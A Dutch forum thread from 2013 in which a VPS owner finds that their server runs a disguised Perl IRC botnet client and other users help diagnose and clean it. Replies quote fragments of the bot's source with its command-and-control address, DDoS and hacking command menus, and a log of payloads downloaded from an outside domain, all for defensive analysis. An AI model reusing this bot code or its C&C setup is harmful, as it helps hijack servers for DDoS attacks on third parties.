Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

VPS met Trojan

Pagina: 1
Acties:

vrijdag 13 december 2013 20:31

Acties:

Verwijderd

Topicstarter
Sinds een tijdje heeft mijn VPS (CentOS) een CPU load van 100% dat wordt veroorzaakt door het Apache Perl proces. En heb ik deze maand opeens 2TB aan dataverkeer verbruikt. Sterk vermoeden dat ik er de VPS een virus te pakken heeft. Ik heb bij de hostingpartij geen managed server pakket aangeschaft, dus moet het zelf onderzoeken.
Elke dag draait er een yum update, dus alles is up2date. Daarnaast draait er DirectAdmin op en die kwam met dit lijstje aanzetten, waar ik ook niks geks in kan ontdekken:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77

This is an automated message notifying you that the 5 minute load average on your system is 14.54.
This has exceeded the 10 threshold.

One Minute      - 21.61
Five Minutes    - 14.54
Fifteen Minutes - 9.27

top - 19:20:04 up 11:29,  0 users,  load average: 21.88, 14.71, 9.36
Tasks: 202 total,   9 running, 189 sleeping,   0 stopped,   4 zombie
Cpu(s):  1.3%us,  1.3%sy,  0.0%ni, 95.9%id,  0.4%wa,  0.0%hi,  0.0%si,  1.0%st
Mem:   3922608k total,  2033336k used,  1889272k free,   288964k buffers
Swap:  1048564k total,        0k used,  1048564k free,   727096k cached

 PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
21635 apache    20   0  137m 6920 1072 R 61.5  0.2   0:19.29 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21646 apache    20   0  137m 6920 1068 R 61.5  0.2   0:20.92 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21648 apache    20   0  137m 6924 1068 R 61.5  0.2   0:23.88 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21651 apache    20   0  137m 6924 1072 R 61.5  0.2   0:27.79 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21658 apache    20   0  137m 6916 1068 R 61.5  0.2   0:19.53 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21659 apache    20   0  137m 6924 1068 R 61.5  0.2   0:20.52 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21650 apache    20   0  137m 6924 1072 R 37.2  0.2   0:19.58 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
21662 apache    20   0  137m 6920 1068 R 35.9  0.2   0:19.01 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
3308 apache    20   0  137m 6948 1096 D  1.3  0.2   0:02.60 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
7384 apache    20   0  132m 6788 1080 S  1.3  0.2   0:37.13 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
7464 apache    20   0  132m 6784 1080 S  1.3  0.2   0:36.55 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
27484 root      20   0 15024 1260  880 R  1.3  0.0   0:00.01 /usr/bin/top -c -b -n 1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
   1 root      20   0 19232 1492 1220 S  0.0  0.0   0:00.82 /sbin/init                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
   2 root      20   0     0    0    0 S  0.0  0.0   0:00.00 [kthreadd]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
   3 root      RT   0     0    0    0 S  0.0  0.0   0:00.42 [migration/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   4 root      20   0     0    0    0 S  0.0  0.0   0:00.41 [ksoftirqd/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   5 root      RT   0     0    0    0 S  0.0  0.0   0:00.00 [migration/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   6 root      RT   0     0    0    0 S  0.0  0.0   0:00.08 [watchdog/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
   7 root      RT   0     0    0    0 S  0.0  0.0   0:00.42 [migration/1]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   8 root      RT   0     0    0    0 S  0.0  0.0   0:00.00 [migration/1]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   9 root      20   0     0    0    0 S  0.0  0.0   0:00.13 [ksoftirqd/1]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
  10 root      RT   0     0    0    0 S  0.0  0.0   0:00.06 [watchdog/1]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
  11 root      RT   0     0    0    0 S  0.0  0.0   0:00.73 [migration/2]                                                                                                              

# En deze met hogere treshold:

This is an automated message notifying you that the 5 minute load average on your system is 348.99.
This has exceeded the 10 threshold.

One Minute      - 307.62
Five Minutes    - 348.99
Fifteen Minutes - 353.1

top - 08:11:16 up  7:36,  0 users,  load average: 307.62, 348.99, 353.10
Tasks: 551 total,   1 running, 455 sleeping,   0 stopped,  95 zombie
Cpu(s):  6.2%us, 10.2%sy,  0.0%ni, 75.5%id,  0.8%wa,  0.0%hi,  0.3%si,  7.1%st
Mem:   3922608k total,  2634156k used,  1288452k free,   127804k buffers
Swap:  1048564k total,     3024k used,  1045540k free,   260540k cached

 PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
14364 root      20   0 15288 1552  880 R  5.7  0.0   0:00.04 /usr/bin/top -c -b -n 1                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            
9414 apache    20   0  132m 6952 1240 S  1.9  0.2   0:46.10 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
9467 apache    20   0  132m 6948 1240 S  1.9  0.2   0:50.68 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
10066 apache    20   0  132m 6948 1240 S  1.9  0.2   0:40.85 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
10109 apache    20   0  132m 6952 1240 S  1.9  0.2   0:51.97 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
10996 apache    20   0  132m 6796 1092 S  1.9  0.2   0:56.55 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11157 apache    20   0  132m 6952 1240 S  1.9  0.2   0:24.60 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11226 apache    20   0  132m 6952 1240 S  1.9  0.2   0:25.62 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11243 apache    20   0  132m 6948 1240 S  1.9  0.2   0:20.94 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11320 apache    20   0  132m 6952 1240 S  1.9  0.2   0:28.53 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11497 apache    20   0  132m 6948 1240 S  1.9  0.2   0:21.66 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11575 apache    20   0  132m 6948 1240 S  1.9  0.2   0:20.80 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11618 apache    20   0  132m 6948 1240 S  1.9  0.2   0:20.63 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11850 apache    20   0  132m 6952 1240 S  1.9  0.2   0:16.36 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
11929 apache    20   0  132m 6948 1240 S  1.9  0.2   0:21.10 /sbin/syslogd                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   1 root      20   0 19232 1264 1108 S  0.0  0.0   0:01.08 /sbin/init                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
   2 root      20   0     0    0    0 S  0.0  0.0   0:00.00 [kthreadd]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                         
   3 root      RT   0     0    0    0 S  0.0  0.0   1:13.83 [migration/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   4 root      20   0     0    0    0 S  0.0  0.0   0:20.04 [ksoftirqd/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   5 root      RT   0     0    0    0 S  0.0  0.0   0:00.00 [migration/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   6 root      RT   0     0    0    0 S  0.0  0.0   5:18.71 [watchdog/0]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       
   7 root      RT   0     0    0    0 S  0.0  0.0   0:00.07 [migration/1]                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      
   8 root      RT   0     0    0    0 S  0.0  0.0   0:00.00 [migration/1]

Iemand tips? En weet anders iemand een bedrijf dat ingeschakeld kan worden bij dit soort kwesties?

[ Voor 146% gewijzigd door Verwijderd op 13-12-2013 20:34 ]

vrijdag 13 december 2013 20:34

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

de hostingpartij zelve inschakelen?
zij wensen zoiets wellicht ook niet op hun servers/netwerk...

en voor de rest vooral even logs nakijken:
- welke scripts/bestanden worden vaak aangeroepen?
-> zodat je ev. te weten komt langs waar ze binnen komen en/of ze geen exploitkit op je server hosten en aanroepen vanop verschillende andere webpagina's

- kijk actieve connecties na en blokkeer er eventueel een paar mbv firewall?
(tijdelijk alles behalve je http/smtp/pop3/ssh dicht gooien ?)

- zijn je foto's eventueel beschermd tegen leechen/embedding op andere (high-traffic)-site's ?
-> altijd een 'leuke' manier om iemand te kloten: zijn foto's van zijn 'hosting pakket met beperkte trafiek' op een paar high-traffic website's embeeden en de traffic-limiet is zo beriekt en de site is dus vrij rap offline...

[ Voor 40% gewijzigd door soulrider op 13-12-2013 20:38 ]

vrijdag 13 december 2013 20:40

Acties:

Verwijderd

Topicstarter
Hostingpartij tikte mij op de vingers, dat ik even moet onderzoeken, maar daar was ik al tijdje mee bezig.

In DirectAdmin kan ik het dataverkeer ook zien, en die tikken tezamen niet de 2TB aan die deze maand verbruikt zijn, dus vermoed een script of iets dergelijks op de server zelf.

Toevallig iemand in de zaal die wat meer over CentOS / Fedora achtige omgevingen weet? Ik zit nu wel wat logs door te lopen, maar heb nog geen nuttige gevonden, want inderdaad het kunnen zien welke scripts etc vaak aangeroepen worden. Of iemand die tips heeft met betrekking tot software om dingen te monitoren?

[ Voor 26% gewijzigd door Verwijderd op 13-12-2013 20:46 ]

vrijdag 13 december 2013 20:54

Acties:

Verwijderd

Iets wat me zo opvalt is dit dat er een proces draait met de naam /sbin/syslogd met als eigenaar apache, dat is iets wat niet klopt.

9414 apache 20 0 132m 6952 1240 S 1.9 0.2 0:46.10 /sbin/syslogd

Vermoedelijk heb je een lek script op je server staan waarmee een stukje code is geïnjecteerd, die draait nu onder de webserver en heeft zichzelf proberen de verbergen door de naam aan te passen.

Probeer als eerst apache helemaal uit te zetten en kill al die processen, desnoods reboot de hele vps.

Installeer dan een tool als rkhunter en ga op zoek naar het lek, elke website doorzoeken naar geuploade code enzo.

Als je er niet uitkomt kun je beter overwegen om heen vps te beheren of een managed vps te huren, waarschijnlijk doet jouw vps nu mee in een botnet waarmee anderen jouw vps besturen.

vrijdag 13 december 2013 21:08

Acties:
  • repsaj
  • Registratie: September 2004
  • Laatst online: 26-11 22:15

repsaj

[offtopic]

[ Voor 95% gewijzigd door repsaj op 13-12-2013 21:08 ]

x

vrijdag 13 december 2013 21:08

Acties:

Verwijderd

Topicstarter
Ja, die vond ik ook al frappant. /sbin/syslogd bestaat in ieder geval niet. Waar kan ik het beste op zoeken, als ik alle code van de sites doorloop?

Reboot doe ik steeds als de server load hoog ligt. Helpt dan af en toe.

Rkhunter net gedraaid. Suspect files: 5, maar welke nu uit de log suspect zijn..
code:
1
2
3
4
5
6
7
8
9
10

/sbin/ifdown                                             [ Warning ]
/sbin/ifup                                               [ Warning ]
/usr/bin/GET                                             [ Warning ]
/usr/bin/ldd                                             [ Warning ]
/usr/bin/whatis                                          [ Warning ]
Checking for passwd file                                 [ Found ]
Checking if SSH root access is allowed                   [ Warning ]
Checking /dev for suspicious file types                  [ Warning ]
Checking for hidden files and directories                [ Warning ]
Checking if SSH root access is allowed                   [ Warning ]

Niks geks toch?

RootCheck net ook gedraaid.

code:
1
2
3
4
5
6
7
8
9

[FAILED]: Trojaned version of file '/usr/bin/du' detected. Signature used: '/dev|w0rm|/prof|file\.h' (Generic).

[INFO]: System Audit: Web exploits (uncommon file name inside htdocs) - Possible compromise. File: /var/www/html/phpMyAdmin-3.5.8.2-all-languages/locale/id. Reference: http://www.ossec.net/wiki/index.php/WebAttacks_links .

[OK]: The following ports are open:
      21 (tcp),22 (tcp),25 (tcp),53 (tcp),53 (udp),
      80 (tcp),110 (tcp),143 (tcp),443 (tcp),
      465 (tcp),587 (tcp),993 (tcp),995 (tcp),
      2222 (tcp),3306 (tcp)


Zegt 'iemand dit wat? :$ Ik heb beide in ieder geval verwijderd en alles is nu Ok bij die Rootcheck.

[ Voor 79% gewijzigd door Verwijderd op 13-12-2013 21:34 ]

vrijdag 13 december 2013 21:18

Acties:

Verwijderd

Na een reboot worden ze waarschijnlijk vrij snel weer opnieuw opgestart.
rkhunter vind niet alles.

Tja lastig om aan te geven waar je precies op moet zoeken, ik kijk meestal naar de bron van zo'n proces via de /proc directory, dan kun je een idee krijgen waar dat proces vandaan komt. Bijvoorbeeld via de cmdline of cwd.

Vaak zitten ze in /tmp /var/tmp en dan in een verborgen directory die een legitieme naam heeft maar voor die plek onlogisch.

vrijdag 13 december 2013 21:22

Acties:
  • Douweegbertje
  • Registratie: Mei 2008
  • Laatst online: 30-10 12:53

Douweegbertje

Wat kinderachtig.. godverdomme

Het helpt ook om te weten wat voor site je draait :) Is het iets custom of middels een CMS?

vrijdag 13 december 2013 21:23

Acties:

Verwijderd

Topicstarter
douweegbertje schreef op vrijdag 13 december 2013 @ 21:22:
Het helpt ook om te weten wat voor site je draait :) Is het iets custom of middels een CMS?
Meerde. Eigen sites, maar tweemaal een Wordpress. Die ik sowieso ga verhuizen naar een hostingpakketje.

vrijdag 13 december 2013 21:28

Acties:
  • Douweegbertje
  • Registratie: Mei 2008
  • Laatst online: 30-10 12:53

Douweegbertje

Wat kinderachtig.. godverdomme

Dan zou ik met je WP sites beginnen te checken. Deze zijn altijd een target omdat dit makkelijk op exploits te crawlen is. Wellicht kun je mij de 2 wordpress urls geven (pm ofzo)? Grote kans dat de user kant ook 'besmet' is :p

zondag 15 december 2013 00:13

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

het lijkt me dat ze via je phpmyadmin zijn binnengeraakt. v 3.5.8.2 heeft namelijk een gaatje of zoveel:

http://web.nvd.nist.gov/v...tail?vulnId=CVE-2013-5029

en wees maar zeker dat er daar crawlers naar zoeken ...

edit:
err ... daar spreken ze over versies 3.5 en 4.0 voor 4.0.5
op andere site's spreken ze over versies 3.5.x voor 3.5.8.2 en 4.x voor 4.0.5

Misschien toch even upgraden naar de 4.1.0 versie ?
(3.5.8.2 is de laatste 3.x versie)

[ Voor 34% gewijzigd door soulrider op 15-12-2013 00:20 ]

zondag 15 december 2013 01:13

Acties:

Verwijderd

Topicstarter
Een nieuwere versie geeft 'ie niet aan
code:
1
2
3
4
5

[root@server ~]# cd /usr/local/directadmin/custombuild
[root@server custombuild]# ./build phpmyadmin
mail-header-patch=yes is set in the options.conf, but is not required with this php version.
To enable the X-Mail header, set mail.add_x_header to 1 in your php.ini
phpMyAdmin 3.5.8.2-all-languages installation is done.

DirectAdmin laat me niet updaten naar een nieuwe phpmyadmin. Lekker dan.

zondag 15 december 2013 01:23

Acties:
  • Megamind
  • Registratie: Augustus 2002
  • Laatst online: 10-09 22:45

Megamind

code:
1
2
3
4

cd /usr/local/directadmin/custombuild
./build update
./build set phpmyadmin_ver 4
./build phpmyadmin

Probeer dat eens

zondag 15 december 2013 01:45

Acties:

Verwijderd

Topicstarter
Thanks Megamind!

zondag 15 december 2013 08:35

Acties:
  • Koffie
  • Registratie: Augustus 2000
  • Laatst online: 16:18

Koffie

Koffiebierbrouwer

Braaimeneer

Move PNS > BV

Tijd voor een nieuwe sig..

zondag 15 december 2013 11:07

Acties:

Verwijderd

Topicstarter
Mocht niet baten.. Vanmorgen weer een CPU load > 95%. Perl proces....

heb maar even tijdelijk het volgende gedaan
code:
1

chmod 000 /usr/bin/perl
, maar dat lijkt me een tijdelijk oplossing.


En wtf, zie dit terugkerend in de error log. Onbekend IP en domein:
code:
1
2
3
4
5
6
7
8
9
10

2013-12-13 16:56:37 (274 KB/s) - "wpa.bwe" saved [40803/40803]

--2013-12-13 16:56:37--  http://alisonmcleastudio.com/jpg/wap.bwe
Resolving alisonmcleastudio.com... 50.63.101.1
Connecting to alisonmcleastudio.com|50.63.101.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 40802 (40K)
Saving to: "wap.bwe"

     0K .......... .......... .......... .........            100%  274K=0.1s
Dat IP-adres is iig geblokt.

[ Voor 57% gewijzigd door Verwijderd op 15-12-2013 11:33 ]

zondag 15 december 2013 18:54

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

en het domein ook ?
(mocht de dns gewijzigd worden naar een andere server ...)

Ik zou zo al alle uitgaande connecties naar een port 80 blokkeren:
waarom zou je server connecteren naar een poort 80 van een andere server?

(tenzij je een proxy of zo draait, maar den zet je het enkel open voor dat proces en niets anders)

ja, ik ben in zulk gevallen voor whitelisten, en deny all voor al de rest...

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#!/usr/local/bin/perl
use HTTP::Request;
use LWP::UserAgent;
my $processo = '/sbin/syslogd';
my $linas_max='3';
my $aspetta='2';
############################################
my @admins=("dark","Lemon-Ice","ElNuevoDiablo","Silenzio");
my @canale=("#perl1");
#Put your channel here
my @nickname = ("BP-");
my $nick = $nickname[rand scalar @nickname];
#Nickname of bot 
my $iname ='.';
chop (my $realname = 'darkCrew');

$iconn='178.17.41.62' unless $iconn;
my $iport='6669';


het is in ieder geval wel het perl-bot-script dat draait ...
en blokkeer zeker die C&C-server op 178.17.41.62:6669 !

en je server zit inderdaad in een niet zo leuk botnetje:
code:
1
2
3
4

             sendraw($ICUsocket, "PRIVMSG $printl :4,1[14@13-----[Help Commands]-----14@4] ");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3i-r-c - For I-R-C Bot Command Help ");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3ddos - For DDos Command Help");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3hacking - For Hacking Command Help");


en maak de folder waarin uploads terecht komen non-executable, want als het script via webserver of via de command-line andere ip-adressen of poorten doorkrijgt om te connecteren ben je terug bij nul:
($_[] staat namelijk voor (command-line-)argumenten)
code:
1
2
3

   my $mionick = $_[0];
   my $iconn_con = $_[1];
   my $iport_con = $_[2];


ps: dat kan dus ook betekenen dat dit script nog een service heeft dat om de zoveel tijd nieuwe C&C-server-ip + poort doorgeeft door het script een keer (te killen en opnieuw) te starten met andere argumenten

[ Voor 72% gewijzigd door soulrider op 15-12-2013 19:40 ]

zondag 15 december 2013 19:00

Acties:
  • Bastien
  • Registratie: Augustus 2001
  • Niet online

Bastien

Probleemeigenaar

Hier komt hetzelfde langs als jouw uitdaging.

Ik voor mezelf zou helemaal geen moeite meer doen om het te isoleren en te verwijderen. Maak een backup van je homedir etc. en begin met een schone installatie (dus niet met een backup van een paar weken terug). Je weet nooit wat er nu allemaal rond heeft gespookt en nog rondspookt op je systeem dus je weet niet of je het ooit weer schoon hebt.

Je privacy is voor het eerst geschonden bij de eerste echo. Daarna wordt het er de rest van je leven niet meer beter op.

zondag 15 december 2013 21:40

Acties:
  • Thralas
  • Registratie: December 2002
  • Laatst online: 15:20

Thralas

soulrider schreef op zondag 15 december 2013 @ 18:54:
Ik zou zo al alle uitgaande connecties naar een port 80 blokkeren:
waarom zou je server connecteren naar een poort 80 van een andere server?
Om updates te fetchen. Desalniettemin is het geen slecht idee om dan met een whitelist te werken en outbound verder alles te firewallen.

De poster boven mij linkt naar een forum waar iemand suggereert dat o.a. Wordpress(plugins) exploited werden. Sowieso zou het triviaal moeten zijn om de gebruikte vulnerability te vinden, kwestie van je access en error logs naast elkaar leggen en kijken naar creation times van payloads + die wget output.

Gezien het een wazige oude amateuristische perlbot betreft en alles onder de apache user draait is het zooitje waarschijnlijk nog wel 'op te ruimen', maar een reinstall is de enige nette optie.

zondag 15 december 2013 23:00

Acties:

Verwijderd

Topicstarter
soulrider schreef op zondag 15 december 2013 @ 18:54:
en het domein ook ?
(mocht de dns gewijzigd worden naar een andere server ...)

Ik zou zo al alle uitgaande connecties naar een port 80 blokkeren:
waarom zou je server connecteren naar een poort 80 van een andere server?

(tenzij je een proxy of zo draait, maar den zet je het enkel open voor dat proces en niets anders)

ja, ik ben in zulk gevallen voor whitelisten, en deny all voor al de rest...

code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#!/usr/local/bin/perl
use HTTP::Request;
use LWP::UserAgent;
my $processo = '/sbin/syslogd';
my $linas_max='3';
my $aspetta='2';
############################################
my @admins=("dark","Lemon-Ice","ElNuevoDiablo","Silenzio");
my @canale=("#perl1");
#Put your channel here
my @nickname = ("BP-");
my $nick = $nickname[rand scalar @nickname];
#Nickname of bot 
my $iname ='.';
chop (my $realname = 'darkCrew');

$iconn='178.17.41.62' unless $iconn;
my $iport='6669';


het is in ieder geval wel het perl-bot-script dat draait ...
en blokkeer zeker die C&C-server op 178.17.41.62:6669 !

en je server zit inderdaad in een niet zo leuk botnetje:
code:
1
2
3
4

             sendraw($ICUsocket, "PRIVMSG $printl :4,1[14@13-----[Help Commands]-----14@4] ");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3i-r-c - For I-R-C Bot Command Help ");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3ddos - For DDos Command Help");
            sendraw($ICUsocket, "PRIVMSG $printl :4!bot 14@3hacking - For Hacking Command Help");


en maak de folder waarin uploads terecht komen non-executable, want als het script via webserver of via de command-line andere ip-adressen of poorten doorkrijgt om te connecteren ben je terug bij nul:
($_[] staat namelijk voor (command-line-)argumenten)
code:
1
2
3

   my $mionick = $_[0];
   my $iconn_con = $_[1];
   my $iport_con = $_[2];


ps: dat kan dus ook betekenen dat dit script nog een service heeft dat om de zoveel tijd nieuwe C&C-server-ip + poort doorgeeft door het script een keer (te killen en opnieuw) te starten met andere argumenten
Hoe blok je het domein dan? En 178.17.41.62:6669? Ip lukt wel, maar met poort.. Heb iig abuse@godaddy.com gemaild van dat domein.
Ik zie in het script geen folder waar ze in terecht komen, dus kan 'm niet chmodden naar 000.

maandag 16 december 2013 02:50

Acties:
  • soulrider
  • Registratie: April 2005
  • Laatst online: 27-11-2017

soulrider

blokkeer alles richting dat ip dan.
kan je geen poorten blokkeren met iptables? *:6669 = block ofzo?
wellicht genoeg info over te vinden op het net - hoe kan men anders al het uitgaande mailverkeer blokkeren en forceren via bv eigen mailservers (bij firma's, isp's,...).

En anders redirect je al dat verkeer naar 127.0.0.1:*ongebruikte poort*
(of iets soortgelijk in de 127.*.*.* range ;-) )

ik stuur bij zoiets vaak alles richting 127.6.6.6, is ook localhost maar veel scripts/programma's detecteren dat niet en zien enkel 127.0.0.1 als localhost ... terwijl het dat volledige 127.*.*.* subnet is...

probeer met een soort van monitoring (file/procesmonitoring?) in het oog te houden of dat bestand/script wordt opgeroepen met commandline-opties...
en voeg de gebruikte hostname/ip-adres ook in je blocklijst toe.


ps: ben geen linux-goeroe, ik meld enkel in welke richting ik zou gaan zoeken als noob indien het mijn server was.
(langs de andere kant: met mijn beperkte kennis zou ik ook geen unmanaged server nemen)

maandag 16 december 2013 02:55

Acties:
  • Megamind
  • Registratie: Augustus 2002
  • Laatst online: 10-09 22:45

Megamind

Je hebt toch DirectAdmin? Ik neem aan dat je dan ook configserver firewall erop hebt staan, bijna essentieel voor de beginnende DA admin.

maandag 16 december 2013 19:12

Acties:

Verwijderd

Topicstarter
Nope, kan niet met
code:
1

iptables -A INPUT -s 178.17.41.* -j DROP

maandag 16 december 2013 20:37

Acties:
  • Thralas
  • Registratie: December 2002
  • Laatst online: 15:20

Thralas

Ga de manpage eens lezen over hoe het wel moet.

En los vervolgens het probleem op; met louter symptoombestrijding kom je niet heel ver.

vrijdag 3 januari 2014 22:30

Acties:
  • CAPSLOCK2000
  • Registratie: Februari 2003
  • Laatst online: 28-11 14:19

CAPSLOCK2000

zie teletekst pagina 888

Je zal moeten herinstalleren. Het verwijderen van dit soort hacks is enorm gespecialiseerd werk. Om het even lullig te zeggen: als je het hier moet komen vragen dan gaat het je niet lukken.

This post is warranted for the full amount you paid me for it.

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq